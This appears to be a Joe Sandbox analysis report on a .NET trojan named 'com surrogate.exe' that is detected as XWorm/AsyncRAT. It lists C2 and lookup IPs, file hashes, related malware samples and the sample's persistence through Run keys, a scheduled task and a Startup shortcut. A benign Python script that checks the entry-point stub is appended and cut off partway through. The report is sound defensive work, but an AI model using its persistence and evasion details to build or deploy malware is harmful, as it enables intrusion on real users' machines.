http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000001.00000002.1865579182.000001ED63FE2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | com surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.coV | powershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.verisign. | powershell.exe, 00000009.00000002.2152559804.00000131EF9A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | com surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
147.185.221.22 | unknown | United States | 12087 | SALSGIVERUS | true

Contacted private IPs
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575693
Start date and time: 2024-12-16 08:35:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: com surrogate.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@20/21@1/3
EGA Information:
• Successful, ratio: 11.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 105
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2288 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3448 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3616 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
• Execution Graph export aborted for target svchostt.exe, PID 4136 because it is empty
• Execution Graph export aborted for target svchostt.exe, PID 4192 because it is empty
• Execution Graph export aborted for target svchostt.exe, PID 5916 because it is empty
• Execution Graph export aborted for target svchostt.exe, PID 7068 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
Time | Type | Description
02:36:33 | API Interceptor | 74x Sleep call for process: powershell.exe modified
02:37:36 | API Interceptor | 39x Sleep call for process: com surrogate.exe modified
07:37:36 | Task Scheduler | Run new task: svchostt path: C:\Users\user\svchostt.exe
07:37:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchostt C:\Users\user\svchostt.exe
07:37:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchostt C:\Users\user\svchostt.exe
07:37:58 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | jerniuiopu.exe | Get hash | malicious | Blackshades | Browse | ip-api.com/json/
208.95.112.1 | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | RdLfpZY5A9.exe | Get hash | malicious | 77Rootkit, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 7laJ4zKd8O.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 3edTbzftGf.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | ip-api.com/json/
208.95.112.1 | gjvU5KOFhX.exe | Get hash | malicious | Discord Token Stealer, Millenuim RAT | Browse | ip-api.com/json/
208.95.112.1 | hvqc3lk7ly.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | ip-api.com/json/
208.95.112.1 | da6ke5KbfB.exe | Get hash | malicious | AsyncRAT, Babadeda, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 03VPFXH490.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Chrome Browser Update.exe | Get hash | malicious | Predator | Browse | ip-api.com/json/
147.185.221.22 | Minet.exe | Get hash | malicious | Njrat | Browse |
147.185.221.22 | CVmkXJ7e0a.exe | Get hash | malicious | SheetRat | Browse |
147.185.221.22 | ozgpPwVAu1.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | exe003.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | OXhiMvksgM.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | 7bZWBYVNPU.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | BWoiYc9WwI.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | fjijTlM2tu.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | gPEbJi1xiY.exe | Get hash | malicious | XWorm | Browse |
147.185.221.22 | dHp58IIEYz.exe | Get hash | malicious | XWorm | Browse |

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ip-api.com | jerniuiopu.exe | Get hash | malicious | Blackshades | Browse | 208.95.112.1
ip-api.com | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | Browse | 208.95.112.1
ip-api.com | RdLfpZY5A9.exe | Get hash | malicious | 77Rootkit, XWorm | Browse | 208.95.112.1
ip-api.com | 7laJ4zKd8O.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | 3edTbzftGf.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 208.95.112.1
ip-api.com | gjvU5KOFhX.exe | Get hash | malicious | Discord Token Stealer, Millenuim RAT | Browse | 208.95.112.1
ip-api.com | hvqc3lk7ly.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 208.95.112.1
ip-api.com | da6ke5KbfB.exe | Get hash | malicious | AsyncRAT, Babadeda, XWorm | Browse | 208.95.112.1
ip-api.com | 03VPFXH490.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
ip-api.com | Chrome Browser Update.exe | Get hash | malicious | Predator | Browse | 208.95.112.1

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TUT-AS | jerniuiopu.exe | Get hash | malicious | Blackshades | Browse | 208.95.112.1
TUT-AS | https://fsharetv.io | Get hash | malicious | Unknown | Browse | 162.252.214.4
TUT-AS | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | Browse | 208.95.112.1
TUT-AS | RdLfpZY5A9.exe | Get hash | malicious | 77Rootkit, XWorm | Browse | 208.95.112.1
TUT-AS | 7laJ4zKd8O.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
TUT-AS | 3edTbzftGf.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 208.95.112.1
TUT-AS | gjvU5KOFhX.exe | Get hash | malicious | Discord Token Stealer, Millenuim RAT | Browse | 208.95.112.1
TUT-AS | hvqc3lk7ly.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 208.95.112.1
TUT-AS | da6ke5KbfB.exe | Get hash | malicious | AsyncRAT, Babadeda, XWorm | Browse | 208.95.112.1
TUT-AS | 03VPFXH490.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
SALSGIVERUS | lastest.exe | Get hash | malicious | Njrat | Browse | 147.185.221.20
SALSGIVERUS | Fast Download.exe | Get hash | malicious | Njrat | Browse | 147.185.221.229
SALSGIVERUS | cnct.exe | Get hash | malicious | Njrat | Browse | 147.185.221.20
SALSGIVERUS | Server1.exe | Get hash | malicious | Njrat | Browse | 147.185.221.17
SALSGIVERUS | njSilent.exe | Get hash | malicious | Njrat | Browse | 147.185.221.19
SALSGIVERUS | Minet.exe | Get hash | malicious | Njrat | Browse | 147.185.221.22
SALSGIVERUS | Discordd.exe | Get hash | malicious | AsyncRAT | Browse | 147.185.221.18
SALSGIVERUS | Discord2.exe | Get hash | malicious | AsyncRAT | Browse | 147.185.221.18
SALSGIVERUS | Discord3.exe | Get hash | malicious | AsyncRAT | Browse | 147.185.221.18
SALSGIVERUS | Loader.exe | Get hash | malicious | AsyncRAT | Browse | 147.185.221.20
No context
No context

Process: C:\Users\user\svchostt.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Users\user\Desktop\com surrogate.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 41
Entropy (8bit): 3.7195394315431693
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5: 0DB526D48DAB0E640663E4DC0EFE82BA
SHA1: 17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256: 934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512: FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious: false
Preview: ....### explorer ###..[WIN]r[WIN]r[WIN]r

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\user\Desktop\com surrogate.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 16 06:37:36 2024, mtime=Mon Dec 16 06:37:36 2024, atime=Mon Dec 16 06:37:36 2024, length=60928, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):780
                                                                          Entropy (8bit):5.075175640087048
                                                                          Encrypted:false
                                                                          SSDEEP:12:8tzU2k4KWSVQNCmVeujAcml/IgUNwuLCM44t2YZ/elFlSJmZmV:8tBKF8RAcmBI7irqyFm
                                                                          MD5:87ADA73CC129D6C0CBE67A9DFC7BBEEA
                                                                          SHA1:FF0096364A8785F2888CFF2C3D9CD0AE4E6CB582
                                                                          SHA-256:9DDAF4CB05FC64DF46144462724D248BC7A15C5959C86D4A2D98160A1BBBF26C
                                                                          SHA-512:B5F2CDC282CC96F8578A664359B85F56427A15E209F1AB415287FD3EA5A6CD15B933C82DD91AEED700CEF9831E24B5ADC1B736C534AC02064521054238D01D05
                                                                          Malicious:false
                                                                          Preview:L..................F.... .....t`.O....`.O....t`.O............................:..DG..Yr?.D..U..k0.&...&......vk.v......t`.O....`.O......t.".CFSF..2......Y.< .svchostt.exe....t.Y^...H.g.3..(.....gVA.G..k...J......Y.<.Y.<....g.....................Ay..s.v.c.h.o.s.t.t...e.x.e...H...J...............-.......I...........).>b.....C:\Users\user\svchostt.exe..!.....\.....\.....\.....\.....\.....\.....\.s.v.c.h.o.s.t.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......035347...........hT..CrF.f4... .si.......,.......hT..CrF.f4... .si.......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                          Process:C:\Users\user\Desktop\com surrogate.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):60928
                                                                          Entropy (8bit):5.797353062024812
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JnF8QSNVQPMbRu7IKhl6F4IkO5bULqRKrn:JFpSNVnbRu7PhW4IkO5bUvn
                                                                          MD5:8843D79E5ECE984EF952051CB5B4F601
                                                                          SHA1:72BB266A7AAE0320F05276A0ED42753C2DC07F2B
                                                                          SHA-256:80D44BB082A49DD49BF5926EA31CA0C225725DAA4BA0614AE3EF1E121FDEF89C
                                                                          SHA-512:E19CB6C484F0415CD3CAB9E716A07CD5AE3662EE22B690310081C68AB73617DF8FA8236A98D72FBF5AE3B88EFEFE88E3C845EB42F0BF9B93963C628573C87BA1
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\svchostt.exe, Author: ditekSHen
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 82%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3J.g................................. ... ....@.. .......................`............@.................................`...K.... ..V....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...V.... ......................@..@.reloc.......@......................@..B........................H.......Pn..........&.....................................................(....*.r...p*. ..W.*..(....*.r...p*. B...*.s.........s.........s.........s.........*.r-..p*. .M^.*.rC..p*. .x!.*.rY..p*. ._..*.ro..p*. A...*.r...p*. ..w.*..((...*.r...p*. 72..*.r...p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(&...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. q_b.*.r...p*. ;d..*.r...p*. ....*.r...p*. ..e.*.r%..p*. ...*.r;..p*. ~.H.*.rQ.
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.797353062024812
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:com surrogate.exe
                                                                          File size:60'928 bytes
                                                                          MD5:8843d79e5ece984ef952051cb5b4f601
                                                                          SHA1:72bb266a7aae0320f05276a0ed42753c2dc07f2b
                                                                          SHA256:80d44bb082a49dd49bf5926ea31ca0c225725daa4ba0614ae3ef1e121fdef89c
                                                                          SHA512:e19cb6c484f0415cd3cab9e716a07cd5ae3662ee22b690310081c68ab73617df8fa8236a98d72fbf5ae3b88efefe88e3c845eb42f0bf9b93963c628573c87ba1
                                                                          SSDEEP:1536:JnF8QSNVQPMbRu7IKhl6F4IkO5bULqRKrn:JFpSNVnbRu7PhW4IkO5bUvn
                                                                          TLSH:3B536C6CB7E44514D1FF9BF568B17212CB3ABA631C13D61F64D901CA1B27A8C8E40BE6
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3J.g................................. ... ....@.. .......................`............@................................
                                                                          Icon Hash:90cececece8e8eb0
                                                                          Entrypoint:0x4101ae
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x67084A33 [Thu Oct 10 21:42:11 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(the bytes following the jmp are all zero; the listing disassembles each 00 00 pair as "add byte ptr [eax], al" for the remainder of the stub)
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x10160         | 0x4b         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x12000         | 0x656        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x14000         | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0xe1b4       | 0xe200   | 57c435be5e64ca183761c1d6f799b496 | False    | 0.5482404590707964 | data      | 5.903765401279519   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0x12000         | 0x656        | 0x800    | abcac03fb4961514399b947f361fe84f | False    | 0.3505859375       | data      | 3.59986308046374    | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000         | 0xc          | 0x200    | f4a2e538b5107826b8a079f48616e9b6 | False    | 0.044921875        | data      | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        | RVA     | Size  | Type                                                                              | Language | Country | ZLIB Complexity
RT_VERSION  | 0x120a0 | 0x3cc | data                                                                              |          |         | 0.42592592592592593
RT_MANIFEST | 0x1246c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |          |         | 0.5469387755102041
DLL         | Import
mscoree.dll | _CorExeMain
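The entry point, IAT, COM descriptor and import fields above together say one thing: the native entry point of this sample is only the CLR bootstrap stub, a `jmp` through the single IAT slot to `mscoree!_CorExeMain`, so the real logic is in the IL (the XWorm/AsyncRAT detections come from there, not from the x86 bytes). The script below is an added example, not part of the Joe Sandbox report, that encodes that check. The header values are transcribed from the report; the six stub bytes `FF 25 00 20 40 00` are the standard encoding of `jmp dword ptr [00402000h]` and, together with the zero padding, are constructed here rather than read from the file.

```python
"""Decide whether a PE32 native entry point is just the CLR bootstrap stub
(jmp through the IAT to mscoree!_CorExeMain).  Added example; header values
transcribed from the sandbox report, stub bytes constructed."""
import struct

# Static fields transcribed from the report.
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x4101ae
SECTIONS = {  # name: (virtual address, virtual size)
    ".text": (0x2000, 0xe1b4),
    ".rsrc": (0x12000, 0x656),
    ".reloc": (0x14000, 0xc),
}
DATA_DIRS = {  # name: (RVA, size)
    "IMPORT": (0x10160, 0x4b),
    "IAT": (0x2000, 0x8),
    "COM_DESCRIPTOR": (0x2008, 0x48),
}
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}

# Constructed bytes at the entry point: FF 25 <disp32> is
# "jmp dword ptr [disp32]"; the trailing zeros are the padding that a
# disassembler renders as "add byte ptr [eax], al".
ENTRY_BYTES = bytes.fromhex("ff25002040000000000000000000")


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for name, (va, size) in sections.items():
        if va <= rva < va + size:
            return name
    return None


def decode_abs_jmp(code):
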